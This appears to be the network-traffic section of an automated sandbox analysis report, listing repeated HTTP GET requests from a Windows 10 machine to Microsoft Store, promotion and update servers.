Source: global traffic	HTTP traffic detected: GET /v1/a/opportunity?pg=PC000P0FR5.0000000IQ8&unid=&placementType=PostOOBE&app=&pid=425106558&cid=128000000001392729&tid=700342085&reqasid=d0ba81e65d964d98ac625f8466261144&region=US&lang=EN-US&oem=&devFam=WINDOWS.DESKTOP&ossku=PROFESSIONAL&cmdVer=10.0.17134.1&mo=&cap=&auid=&anid=&muid=&persid=&itemId=9NH2GPH4JZS4&skuId=0010&installKind=Install&ctid=store-curated-postoobe&bSrc=i.t&asid=57d951360cdd4c8fac5a233947b0e595&time=20220608T165610Z HTTP/1.1Accept-Encoding: gzip, deflateUser-Agent: WindowsShellClient/9.0.40929.0 (Windows)Host: ris.api.iris.microsoft.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /v1/a/opportunity?pg=PC000P0FR5.0000000IQ8&unid=&placementType=PostOOBE&app=&pid=425106558&cid=128000000001392729&tid=700342085&reqasid=d0ba81e65d964d98ac625f8466261144&region=US&lang=EN-US&oem=&devFam=WINDOWS.DESKTOP&ossku=PROFESSIONAL&cmdVer=10.0.17134.1&mo=&cap=&auid=&anid=&muid=&persid=&itemId=9NBLGGH6J6VK&skuId=0010&installKind=RedirectTile&ctid=store-curated-postoobe&bSrc=i.t&asid=57d951360cdd4c8fac5a233947b0e595&time=20220608T165611Z HTTP/1.1Accept-Encoding: gzip, deflateUser-Agent: WindowsShellClient/9.0.40929.0 (Windows)Host: ris.api.iris.microsoft.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /v1/a/opportunity?pg=PC000P0FR5.0000000IQ8&unid=&placementType=PostOOBE&app=&pid=425106558&cid=128000000001392729&tid=700342085&reqasid=d0ba81e65d964d98ac625f8466261144&region=US&lang=EN-US&oem=&devFam=WINDOWS.DESKTOP&ossku=PROFESSIONAL&cmdVer=10.0.17134.1&mo=&cap=&auid=&anid=&muid=&persid=&itemId=9P6RC76MSMMJ&skuId=0010&installKind=Install&ctid=store-curated-postoobe&bSrc=i.t&asid=57d951360cdd4c8fac5a233947b0e595&time=20220608T165615Z HTTP/1.1Accept-Encoding: gzip, deflateUser-Agent: WindowsShellClient/9.0.40929.0 (Windows)Host: ris.api.iris.microsoft.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /v1/a/opportunity?pg=PC000P0FR5.0000000IQ8&unid=&placementType=PostOOBE&app=&pid=425106558&cid=128000000001392729&tid=700342085&reqasid=d0ba81e65d964d98ac625f8466261144&region=US&lang=EN-US&oem=&devFam=WINDOWS.DESKTOP&ossku=PROFESSIONAL&cmdVer=10.0.17134.1&mo=&cap=&auid=&anid=&muid=&persid=&itemId=9WZDNCRFJ27N&skuId=0010&installKind=Install&ctid=store-curated-postoobe&bSrc=i.t&asid=57d951360cdd4c8fac5a233947b0e595&time=20220608T165616Z HTTP/1.1Accept-Encoding: gzip, deflateUser-Agent: WindowsShellClient/9.0.40929.0 (Windows)Host: ris.api.iris.microsoft.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /v1/a/opportunity?pg=PC000P0FR5.0000000IQ8&unid=&placementType=PostOOBE&app=&pid=425106558&cid=128000000001392729&tid=700342085&reqasid=d0ba81e65d964d98ac625f8466261144&region=US&lang=EN-US&oem=&devFam=WINDOWS.DESKTOP&ossku=PROFESSIONAL&cmdVer=10.0.17134.1&mo=&cap=&auid=&anid=&muid=&persid=&itemId=9N0866FS04W8&skuId=0010&installKind=Install&ctid=store-curated-postoobe&bSrc=i.t&asid=57d951360cdd4c8fac5a233947b0e595&time=20220608T165616Z HTTP/1.1Accept-Encoding: gzip, deflateUser-Agent: WindowsShellClient/9.0.40929.0 (Windows)Host: ris.api.iris.microsoft.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /v1/a/opportunity?pg=PC000P0FR5.0000000IQ8&unid=&placementType=PostOOBE&app=&pid=425106558&cid=128000000001392729&tid=700342085&reqasid=d0ba81e65d964d98ac625f8466261144&region=US&lang=EN-US&oem=&devFam=WINDOWS.DESKTOP&ossku=PROFESSIONAL&cmdVer=10.0.17134.1&mo=&cap=&auid=&anid=&muid=&persid=&itemId=9WZDNCRFJ10M&skuId=0010&installKind=Install&ctid=store-curated-postoobe&bSrc=i.t&asid=57d951360cdd4c8fac5a233947b0e595&time=20220608T165618Z HTTP/1.1Accept-Encoding: gzip, deflateUser-Agent: WindowsShellClient/9.0.40929.0 (Windows)Host: ris.api.iris.microsoft.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /v1/a/opportunity?pg=PC000P0FR5.0000000IQ8&unid=&placementType=PostOOBE&app=&pid=425106558&cid=128000000001392729&tid=700342085&reqasid=d0ba81e65d964d98ac625f8466261144&region=US&lang=EN-US&oem=&devFam=WINDOWS.DESKTOP&ossku=PROFESSIONAL&cmdVer=10.0.17134.1&mo=&cap=&auid=&anid=&muid=&persid=&itemId=9WZDNCRFJ140&skuId=0010&installKind=RedirectTile&ctid=store-curated-postoobe&bSrc=i.t&asid=57d951360cdd4c8fac5a233947b0e595&time=20220608T165620Z HTTP/1.1Accept-Encoding: gzip, deflateUser-Agent: WindowsShellClient/9.0.40929.0 (Windows)Host: ris.api.iris.microsoft.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /SLS/%7B9482F4B4-E343-43B6-B170-9A65BC822C77%7D/x64/10.0.17134.1/0?CH=17&L=en-US&P=&PT=0x30&WUA=10.0.17134.1&MK=V9ZhaY+AExEokuW&MD=nDwd7vN9 HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/1.81Host: sls.update.microsoft.com
Source: global traffic	HTTP traffic detected: GET /v1/a/opportunity?pg=PC000P0FR5.0000000IQ8&unid=&placementType=PostOOBE&app=&pid=425106558&cid=128000000001392729&tid=700342085&reqasid=d0ba81e65d964d98ac625f8466261144&region=US&lang=EN-US&oem=&devFam=WINDOWS.DESKTOP&ossku=PROFESSIONAL&cmdVer=10.0.17134.1&mo=&cap=&auid=&anid=&muid=&persid=&itemId=9NC2FBTHCJV8&skuId=0010&installKind=RedirectTile&ctid=store-curated-postoobe&bSrc=i.t&asid=57d951360cdd4c8fac5a233947b0e595&time=20220608T165622Z HTTP/1.1Accept-Encoding: gzip, deflateUser-Agent: WindowsShellClient/9.0.40929.0 (Windows)Host: ris.api.iris.microsoft.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /v1/a/opportunity?pg=PC000P0FR5.0000000IQ8&unid=&placementType=PostOOBE&app=&pid=425106558&cid=128000000001392729&tid=700342085&reqasid=d0ba81e65d964d98ac625f8466261144&region=US&lang=EN-US&oem=&devFam=WINDOWS.DESKTOP&ossku=PROFESSIONAL&cmdVer=10.0.17134.1&mo=&cap=&auid=&anid=&muid=&persid=&itemId=9NBLGGH1CQ7L&skuId=0010&installKind=RedirectTile&ctid=store-curated-postoobe&bSrc=i.t&asid=57d951360cdd4c8fac5a233947b0e595&time=20220608T165624Z HTTP/1.1Accept-Encoding: gzip, deflateUser-Agent: WindowsShellClient/9.0.40929.0 (Windows)Host: ris.api.iris.microsoft.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /SLS/%7B9482F4B4-E343-43B6-B170-9A65BC822C77%7D/x64/10.0.17134.1/0?CH=17&L=en-US&P=&PT=0x30&WUA=10.0.17134.1&MK=V9ZhaY+AExEokuW&MD=nDwd7vN9 HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/1.81Host: sls.update.microsoft.com
Source: global traffic	HTTP traffic detected: GET /v1/a/impression?pg=PC000P0FR5.0000000IQ8&unid=&placementType=PostOOBE&app=&pid=425106558&cid=128000000001392729&tid=700342085&reqasid=d0ba81e65d964d98ac625f8466261144&region=US&lang=EN-US&oem=&devFam=WINDOWS.DESKTOP&ossku=PROFESSIONAL&cmdVer=10.0.17134.1&mo=&cap=&auid=&anid=&muid=&persid=&bSrc=i.t&time=20220608T165625Z&asid=57d951360cdd4c8fac5a233947b0e595&eid= HTTP/1.1Accept-Encoding: gzip, deflateUser-Agent: WindowsShellClient/9.0.40929.0 (Windows)Host: ris.api.iris.microsoft.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /v1/a/installComplete?pg=PC000P0FR5.0000000IQ8&unid=&placementType=PostOOBE&app=&pid=425106554&cid=128000000001392709&tid=700342084&reqasid=db438b8e50164ff5b8bd81712c333d20&region=US&lang=EN-US&oem=&devFam=WINDOWS.DESKTOP&ossku=PROFESSIONAL&cmdVer=10.0.17134.1&mo=&cap=&auid=&anid=&muid=&persid=&itemId=9WZDNCRFJ3P2&skuId=0010&installKind=Install&ctid=store-curated-postoobe&bSrc=i.t&asid=bb4e26aa6fae45b5bae03115aaadb587&time=20220608T165631Z HTTP/1.1Accept-Encoding: gzip, deflateUser-Agent: WindowsShellClient/9.0.40929.0 (Windows)Host: ris.api.iris.microsoft.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /v1/a/installComplete?pg=PC000P0FR5.0000000IQ8&unid=&placementType=PostOOBE&app=&pid=425106554&cid=128000000001392709&tid=700342084&reqasid=db438b8e50164ff5b8bd81712c333d20&region=US&lang=EN-US&oem=&devFam=WINDOWS.DESKTOP&ossku=PROFESSIONAL&cmdVer=10.0.17134.1&mo=&cap=&auid=&anid=&muid=&persid=&itemId=9NBLGGH5FV99&skuId=0010&installKind=Install&ctid=store-curated-postoobe&bSrc=i.t&asid=bb4e26aa6fae45b5bae03115aaadb587&time=20220608T165632Z HTTP/1.1Accept-Encoding: gzip, deflateUser-Agent: WindowsShellClient/9.0.40929.0 (Windows)Host: ris.api.iris.microsoft.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /SLS/%7B9482F4B4-E343-43B6-B170-9A65BC822C77%7D/x64/10.0.17134.1/0?CH=17&L=en-US&P=&PT=0x30&WUA=10.0.17134.1&MK=V9ZhaY+AExEokuW&MD=nDwd7vN9 HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/1.81Host: sls.update.microsoft.com
Source: global traffic	HTTP traffic detected: GET /v1/a/opportunity?pg=PC000P0FR5.0000000IQ8&unid=&placementType=PostOOBE&app=&pid=425106554&cid=128000000001392709&tid=700342084&reqasid=db438b8e50164ff5b8bd81712c333d20&region=US&lang=EN-US&oem=&devFam=WINDOWS.DESKTOP&ossku=PROFESSIONAL&cmdVer=10.0.17134.1&mo=&cap=&auid=&anid=&muid=&persid=&itemId=9NXQXXLFST89&skuId=0010&installKind=Install&ctid=store-curated-postoobe&bSrc=i.t&asid=bb4e26aa6fae45b5bae03115aaadb587&time=20220608T165633Z HTTP/1.1Accept-Encoding: gzip, deflateUser-Agent: WindowsShellClient/9.0.40929.0 (Windows)Host: ris.api.iris.microsoft.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /v1/a/opportunity?pg=PC000P0FR5.0000000IQ8&unid=&placementType=PostOOBE&app=&pid=425106554&cid=128000000001392709&tid=700342084&reqasid=db438b8e50164ff5b8bd81712c333d20&region=US&lang=EN-US&oem=&devFam=WINDOWS.DESKTOP&ossku=PROFESSIONAL&cmdVer=10.0.17134.1&mo=&cap=&auid=&anid=&muid=&persid=&itemId=9WZDNCRFHVFW&skuId=0010&installKind=Install&ctid=store-curated-postoobe&bSrc=i.t&asid=bb4e26aa6fae45b5bae03115aaadb587&time=20220608T165634Z HTTP/1.1Accept-Encoding: gzip, deflateUser-Agent: WindowsShellClient/9.0.40929.0 (Windows)Host: ris.api.iris.microsoft.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /v7.0/products/lookup?alternateId=PackageFamilyName&value=SpotifyAB.SpotifyMusic_zpdnekdrzrea0&market=US&languages=en-US%2Cen%2Cneutral&fieldsTemplate=InstallAgent&moId=Public&oemId=Public&scmId=Public HTTP/1.1Connection: Keep-AliveContent-Type: application/jsonUser-Agent: Install ServiceMS-CV: X7VJJGZs40+xGkKP.0.2.4Host: displaycatalog.mp.microsoft.com
Source: global traffic	HTTP traffic detected: GET /v1/a/opportunity?pg=PC000P0FR5.0000000IQ8&unid=&placementType=PostOOBE&app=&pid=425106554&cid=128000000001392709&tid=700342084&reqasid=db438b8e50164ff5b8bd81712c333d20&region=US&lang=EN-US&oem=&devFam=WINDOWS.DESKTOP&ossku=PROFESSIONAL&cmdVer=10.0.17134.1&mo=&cap=&auid=&anid=&muid=&persid=&itemId=9NCBCSZSJRSB&skuId=0010&installKind=Install&ctid=store-curated-postoobe&bSrc=i.t&asid=bb4e26aa6fae45b5bae03115aaadb587&time=20220608T165635Z HTTP/1.1Accept-Encoding: gzip, deflateUser-Agent: WindowsShellClient/9.0.40929.0 (Windows)Host: ris.api.iris.microsoft.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /v1/a/opportunity?pg=PC000P0FR5.0000000IQ8&unid=&placementType=PostOOBE&app=&pid=425106554&cid=128000000001392709&tid=700342084&reqasid=db438b8e50164ff5b8bd81712c333d20&region=US&lang=EN-US&oem=&devFam=WINDOWS.DESKTOP&ossku=PROFESSIONAL&cmdVer=10.0.17134.1&mo=&cap=&auid=&anid=&muid=&persid=&itemId=9NMPJ99VJBWV&skuId=0010&installKind=Install&ctid=store-curated-postoobe&bSrc=i.t&asid=bb4e26aa6fae45b5bae03115aaadb587&time=20220608T165635Z HTTP/1.1Accept-Encoding: gzip, deflateUser-Agent: WindowsShellClient/9.0.40929.0 (Windows)Host: ris.api.iris.microsoft.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /SLS/%7B9482F4B4-E343-43B6-B170-9A65BC822C77%7D/x64/10.0.17134.1/0?CH=17&L=en-US&P=&PT=0x30&WUA=10.0.17134.1&MK=V9ZhaY+AExEokuW&MD=nDwd7vN9 HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/1.81Host: sls.update.microsoft.com
Source: global traffic	HTTP traffic detected: GET /v1/a/installComplete?pg=PC000P0FR5.0000000IQ8&unid=&placementType=PostOOBE&app=&pid=425106558&cid=128000000001392729&tid=700342085&reqasid=d0ba81e65d964d98ac625f8466261144&region=US&lang=EN-US&oem=&devFam=WINDOWS.DESKTOP&ossku=PROFESSIONAL&cmdVer=10.0.17134.1&mo=&cap=&auid=&anid=&muid=&persid=&itemId=9WZDNCRFHWD2&skuId=0010&installKind=RedirectTile&ctid=store-curated-postoobe&bSrc=i.t&asid=57d951360cdd4c8fac5a233947b0e595&time=20220608T165607Z HTTP/1.1Accept-Encoding: gzip, deflateUser-Agent: WindowsShellClient/9.0.40929.0 (Windows)Host: ris.api.iris.microsoft.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /v1/a/opportunity?pg=PC000P0FR5.0000000IQ8&unid=&placementType=PostOOBE&app=&pid=425106558&cid=128000000001392729&tid=700342085&reqasid=d0ba81e65d964d98ac625f8466261144&region=US&lang=EN-US&oem=&devFam=WINDOWS.DESKTOP&ossku=PROFESSIONAL&cmdVer=10.0.17134.1&mo=&cap=&auid=&anid=&muid=&persid=&itemId=9NBLGGGZM6WM&skuId=0010&installKind=RedirectTile&ctid=store-curated-postoobe&bSrc=i.t&asid=57d951360cdd4c8fac5a233947b0e595&time=20220608T165608Z HTTP/1.1Accept-Encoding: gzip, deflateUser-Agent: WindowsShellClient/9.0.40929.0 (Windows)Host: ris.api.iris.microsoft.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /v1/a/opportunity?pg=PC000P0FR5.0000000IQ8&unid=&placementType=PostOOBE&app=&pid=425106558&cid=128000000001392729&tid=700342085&reqasid=d0ba81e65d964d98ac625f8466261144&region=US&lang=EN-US&oem=&devFam=WINDOWS.DESKTOP&ossku=PROFESSIONAL&cmdVer=10.0.17134.1&mo=&cap=&auid=&anid=&muid=&persid=&itemId=9WZDNCRFHWD2&skuId=0010&installKind=RedirectTile&ctid=store-curated-postoobe&bSrc=i.t&asid=57d951360cdd4c8fac5a233947b0e595&time=20220608T165609Z HTTP/1.1Accept-Encoding: gzip, deflateUser-Agent: WindowsShellClient/9.0.40929.0 (Windows)Host: ris.api.iris.microsoft.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /SLS/%7B9482F4B4-E343-43B6-B170-9A65BC822C77%7D/x64/10.0.17134.1/0?CH=17&L=en-US&P=&PT=0x30&WUA=10.0.17134.1&MK=V9ZhaY+AExEokuW&MD=nDwd7vN9 HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/1.81Host: sls.update.microsoft.com
Source: global traffic	HTTP traffic detected: GET /v1/a/opportunity?pg=PC000P0FR5.0000000IQ8&unid=&placementType=PostOOBE&app=&pid=425106558&cid=128000000001392729&tid=700342085&reqasid=d0ba81e65d964d98ac625f8466261144&region=US&lang=EN-US&oem=&devFam=WINDOWS.DESKTOP&ossku=PROFESSIONAL&cmdVer=10.0.17134.1&mo=&cap=&auid=&anid=&muid=&persid=&itemId=9NH2GPH4JZS4&skuId=0010&installKind=Install&ctid=store-curated-postoobe&bSrc=i.t&asid=57d951360cdd4c8fac5a233947b0e595&time=20220608T165610Z HTTP/1.1Accept-Encoding: gzip, deflateUser-Agent: WindowsShellClient/9.0.40929.0 (Windows)Host: ris.api.iris.microsoft.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /v1/a/opportunity?pg=PC000P0FR5.0000000IQ8&unid=&placementType=PostOOBE&app=&pid=425106558&cid=128000000001392729&tid=700342085&reqasid=d0ba81e65d964d98ac625f8466261144&region=US&lang=EN-US&oem=&devFam=WINDOWS.DESKTOP&ossku=PROFESSIONAL&cmdVer=10.0.17134.1&mo=&cap=&auid=&anid=&muid=&persid=&itemId=9NBLGGH6J6VK&skuId=0010&installKind=RedirectTile&ctid=store-curated-postoobe&bSrc=i.t&asid=57d951360cdd4c8fac5a233947b0e595&time=20220608T165611Z HTTP/1.1Accept-Encoding: gzip, deflateUser-Agent: WindowsShellClient/9.0.40929.0 (Windows)Host: ris.api.iris.microsoft.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /v7.0/products/lookup?alternateId=PackageFamilyName&value=Microsoft.YourPhone_8wekyb3d8bbwe&market=US&languages=en-US%2Cen%2Cneutral&fieldsTemplate=InstallAgent&moId=Public&oemId=Public&scmId=Public HTTP/1.1Connection: Keep-AliveContent-Type: application/jsonUser-Agent: Install ServiceMS-CV: fQPxzjtQa0eADZkB.0.2.4Host: displaycatalog.mp.microsoft.com
Source: global traffic	HTTP traffic detected: GET /v1/a/opportunity?pg=PC000P0FR5.0000000IQ8&unid=&placementType=PostOOBE&app=&pid=425106558&cid=128000000001392729&tid=700342085&reqasid=d0ba81e65d964d98ac625f8466261144&region=US&lang=EN-US&oem=&devFam=WINDOWS.DESKTOP&ossku=PROFESSIONAL&cmdVer=10.0.17134.1&mo=&cap=&auid=&anid=&muid=&persid=&itemId=9P6RC76MSMMJ&skuId=0010&installKind=Install&ctid=store-curated-postoobe&bSrc=i.t&asid=57d951360cdd4c8fac5a233947b0e595&time=20220608T165615Z HTTP/1.1Accept-Encoding: gzip, deflateUser-Agent: WindowsShellClient/9.0.40929.0 (Windows)Host: ris.api.iris.microsoft.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /v1/a/impression?CID=128000000000402926&region=US&lang=EN-US&oem=&devFam=WINDOWS.DESKTOP&ossku=PROFESSIONAL&cmdVer=10.0.17134.1&mo=&cap=&EID=&&PID=400089837&UIT=P-&TargetID=700129702&AN=679670357&PG=PC000P0FR5.0000000IRT&REQASID=8269C44C06284E1CA50E8D554A67885C&UNID=338388&ASID=b294f7550fc04b4bb1601ebac6b0c790&PERSID=DBDE13DC697F71846A990CDFDC016FBD&GLOBALDEVICEID=6755432004667435&LOCALID=w:472DC600-FEAB-E7F8-720D-1E33F00FD1E7&DS_EVTID=e4c7f4e268ec427292df4f5be8ee76cd&DEVOSVER=10.0.17134.1&REQT=20220608T075602&TIME=20220608T165640Z&ARCRAS=&CLR=CDM HTTP/1.1Accept-Encoding: gzip, deflateUser-Agent: WindowsShellClient/9.0.40929.0 (Windows)Host: ris.api.iris.microsoft.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /v1/a/opportunity?pg=PC000P0FR5.0000000IQ8&unid=&placementType=PostOOBE&app=&pid=425106558&cid=128000000001392729&tid=700342085&reqasid=d0ba81e65d964d98ac625f8466261144&region=US&lang=EN-US&oem=&devFam=WINDOWS.DESKTOP&ossku=PROFESSIONAL&cmdVer=10.0.17134.1&mo=&cap=&auid=&anid=&muid=&persid=&itemId=9WZDNCRFJ27N&skuId=0010&installKind=Install&ctid=store-curated-postoobe&bSrc=i.t&asid=57d951360cdd4c8fac5a233947b0e595&time=20220608T165616Z HTTP/1.1Accept-Encoding: gzip, deflateUser-Agent: WindowsShellClient/9.0.40929.0 (Windows)Host: ris.api.iris.microsoft.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /v1/a/impression?CID=128000000000402926&region=US&lang=EN-US&oem=&devFam=WINDOWS.DESKTOP&ossku=PROFESSIONAL&cmdVer=10.0.17134.1&mo=&cap=&EID=&&PID=400089837&UIT=P-&TargetID=700129702&AN=679670357&PG=PC000P0FR5.0000000IRT&REQASID=8269C44C06284E1CA50E8D554A67885C&UNID=338388&ASID=b294f7550fc04b4bb1601ebac6b0c790&PERSID=DBDE13DC697F71846A990CDFDC016FBD&GLOBALDEVICEID=6755432004667435&LOCALID=w:472DC600-FEAB-E7F8-720D-1E33F00FD1E7&DS_EVTID=e4c7f4e268ec427292df4f5be8ee76cd&DEVOSVER=10.0.17134.1&REQT=20220608T075602&TIME=20220608T165641Z&ARCRAS=&CLR=CDM HTTP/1.1Accept-Encoding: gzip, deflateUser-Agent: WindowsShellClient/9.0.40929.0 (Windows)Host: ris.api.iris.microsoft.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /v1/a/opportunity?pg=PC000P0FR5.0000000IQ8&unid=&placementType=PostOOBE&app=&pid=425106558&cid=128000000001392729&tid=700342085&reqasid=d0ba81e65d964d98ac625f8466261144&region=US&lang=EN-US&oem=&devFam=WINDOWS.DESKTOP&ossku=PROFESSIONAL&cmdVer=10.0.17134.1&mo=&cap=&auid=&anid=&muid=&persid=&itemId=9N0866FS04W8&skuId=0010&installKind=Install&ctid=store-curated-postoobe&bSrc=i.t&asid=57d951360cdd4c8fac5a233947b0e595&time=20220608T165616Z HTTP/1.1Accept-Encoding: gzip, deflateUser-Agent: WindowsShellClient/9.0.40929.0 (Windows)Host: ris.api.iris.microsoft.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /SLS/%7B9482F4B4-E343-43B6-B170-9A65BC822C77%7D/x64/10.0.17134.1/0?CH=17&L=en-US&P=&PT=0x30&WUA=10.0.17134.1&MK=V9ZhaY+AExEokuW&MD=nDwd7vN9 HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/1.81Host: sls.update.microsoft.com
Source: global traffic	HTTP traffic detected: GET /v1/a/opportunity?pg=PC000P0FR5.0000000IQ8&unid=&placementType=PostOOBE&app=&pid=425106558&cid=128000000001392729&tid=700342085&reqasid=d0ba81e65d964d98ac625f8466261144&region=US&lang=EN-US&oem=&devFam=WINDOWS.DESKTOP&ossku=PROFESSIONAL&cmdVer=10.0.17134.1&mo=&cap=&auid=&anid=&muid=&persid=&itemId=9WZDNCRFJ10M&skuId=0010&installKind=Install&ctid=store-curated-postoobe&bSrc=i.t&asid=57d951360cdd4c8fac5a233947b0e595&time=20220608T165618Z HTTP/1.1Accept-Encoding: gzip, deflateUser-Agent: WindowsShellClient/9.0.40929.0 (Windows)Host: ris.api.iris.microsoft.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /v1/a/opportunity?pg=PC000P0FR5.0000000IQ8&unid=&placementType=PostOOBE&app=&pid=425106558&cid=128000000001392729&tid=700342085&reqasid=d0ba81e65d964d98ac625f8466261144&region=US&lang=EN-US&oem=&devFam=WINDOWS.DESKTOP&ossku=PROFESSIONAL&cmdVer=10.0.17134.1&mo=&cap=&auid=&anid=&muid=&persid=&itemId=9WZDNCRFJ140&skuId=0010&installKind=RedirectTile&ctid=store-curated-postoobe&bSrc=i.t&asid=57d951360cdd4c8fac5a233947b0e595&time=20220608T165620Z HTTP/1.1Accept-Encoding: gzip, deflateUser-Agent: WindowsShellClient/9.0.40929.0 (Windows)Host: ris.api.iris.microsoft.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /v1/a/opportunity?pg=PC000P0FR5.0000000IQ8&unid=&placementType=PostOOBE&app=&pid=425106558&cid=128000000001392729&tid=700342085&reqasid=d0ba81e65d964d98ac625f8466261144&region=US&lang=EN-US&oem=&devFam=WINDOWS.DESKTOP&ossku=PROFESSIONAL&cmdVer=10.0.17134.1&mo=&cap=&auid=&anid=&muid=&persid=&itemId=9NC2FBTHCJV8&skuId=0010&installKind=RedirectTile&ctid=store-curated-postoobe&bSrc=i.t&asid=57d951360cdd4c8fac5a233947b0e595&time=20220608T165622Z HTTP/1.1Accept-Encoding: gzip, deflateUser-Agent: WindowsShellClient/9.0.40929.0 (Windows)Host: ris.api.iris.microsoft.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /SLS/%7B9482F4B4-E343-43B6-B170-9A65BC822C77%7D/x64/10.0.17134.1/0?CH=17&L=en-US&P=&PT=0x30&WUA=10.0.17134.1&MK=V9ZhaY+AExEokuW&MD=nDwd7vN9 HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/1.81Host: sls.update.microsoft.com
Source: global traffic	HTTP traffic detected: GET /v1/a/opportunity?pg=PC000P0FR5.0000000IQ8&unid=&placementType=PostOOBE&app=&pid=425106558&cid=128000000001392729&tid=700342085&reqasid=d0ba81e65d964d98ac625f8466261144&region=US&lang=EN-US&oem=&devFam=WINDOWS.DESKTOP&ossku=PROFESSIONAL&cmdVer=10.0.17134.1&mo=&cap=&auid=&anid=&muid=&persid=&itemId=9NBLGGH1CQ7L&skuId=0010&installKind=RedirectTile&ctid=store-curated-postoobe&bSrc=i.t&asid=57d951360cdd4c8fac5a233947b0e595&time=20220608T165624Z HTTP/1.1Accept-Encoding: gzip, deflateUser-Agent: WindowsShellClient/9.0.40929.0 (Windows)Host: ris.api.iris.microsoft.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /v1/a/impression?pg=PC000P0FR5.0000000IQ8&unid=&placementType=PostOOBE&app=&pid=425106558&cid=128000000001392729&tid=700342085&reqasid=d0ba81e65d964d98ac625f8466261144&region=US&lang=EN-US&oem=&devFam=WINDOWS.DESKTOP&ossku=PROFESSIONAL&cmdVer=10.0.17134.1&mo=&cap=&auid=&anid=&muid=&persid=&bSrc=i.t&time=20220608T165625Z&asid=57d951360cdd4c8fac5a233947b0e595&eid= HTTP/1.1Accept-Encoding: gzip, deflateUser-Agent: WindowsShellClient/9.0.40929.0 (Windows)Host: ris.api.iris.microsoft.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /v7.0/products/lookup?alternateId=PackageFamilyName&value=Microsoft.BingNews_8wekyb3d8bbwe&market=US&languages=en-US%2Cen%2Cneutral&fieldsTemplate=InstallAgent&moId=Public&oemId=Public&scmId=Public HTTP/1.1Connection: Keep-AliveContent-Type: application/jsonUser-Agent: Install ServiceMS-CV: Fm0obDvuHUOS4uL1.0.2.4Host: displaycatalog.mp.microsoft.com
Source: global traffic	HTTP traffic detected: GET /v1/a/installComplete?pg=PC000P0FR5.0000000IQ8&unid=&placementType=PostOOBE&app=&pid=425106554&cid=128000000001392709&tid=700342084&reqasid=db438b8e50164ff5b8bd81712c333d20&region=US&lang=EN-US&oem=&devFam=WINDOWS.DESKTOP&ossku=PROFESSIONAL&cmdVer=10.0.17134.1&mo=&cap=&auid=&anid=&muid=&persid=&itemId=9WZDNCRFJ3P2&skuId=0010&installKind=Install&ctid=store-curated-postoobe&bSrc=i.t&asid=bb4e26aa6fae45b5bae03115aaadb587&time=20220608T165631Z HTTP/1.1Accept-Encoding: gzip, deflateUser-Agent: WindowsShellClient/9.0.40929.0 (Windows)Host: ris.api.iris.microsoft.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /v1/a/installComplete?pg=PC000P0FR5.0000000IQ8&unid=&placementType=PostOOBE&app=&pid=425106554&cid=128000000001392709&tid=700342084&reqasid=db438b8e50164ff5b8bd81712c333d20&region=US&lang=EN-US&oem=&devFam=WINDOWS.DESKTOP&ossku=PROFESSIONAL&cmdVer=10.0.17134.1&mo=&cap=&auid=&anid=&muid=&persid=&itemId=9NBLGGH5FV99&skuId=0010&installKind=Install&ctid=store-curated-postoobe&bSrc=i.t&asid=bb4e26aa6fae45b5bae03115aaadb587&time=20220608T165632Z HTTP/1.1Accept-Encoding: gzip, deflateUser-Agent: WindowsShellClient/9.0.40929.0 (Windows)Host: ris.api.iris.microsoft.comConnection: Keep-Alive
